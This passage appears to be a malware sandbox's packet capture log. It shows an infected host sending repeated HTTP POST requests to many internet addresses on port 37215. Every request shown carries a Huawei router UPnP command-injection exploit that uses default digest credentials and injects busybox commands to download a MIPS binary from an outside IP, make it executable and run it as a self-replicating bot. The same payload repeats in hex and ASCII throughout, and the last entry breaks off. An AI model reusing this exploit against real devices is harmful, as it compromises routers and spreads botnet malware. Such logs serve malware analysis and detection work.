3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2397192.168.2.1351594157.14.57.4137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.794995070 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2398192.168.2.1351806197.0.128.5237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.795013905 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2399192.168.2.1350982197.208.242.15637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.795062065 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2400192.168.2.133860299.145.208.4337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.795221090 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2401192.168.2.1351450157.68.130.3437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.795244932 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2402192.168.2.1336066172.238.45.17537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.795263052 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2403192.168.2.1357796210.83.187.9837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.795289040 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2404192.168.2.1343370134.36.5.11137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.795356989 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2405192.168.2.1340376157.147.118.1737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.795375109 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2406192.168.2.134752874.180.214.11137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.795495987 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2407192.168.2.1342954210.82.27.7937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:27.795511007 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
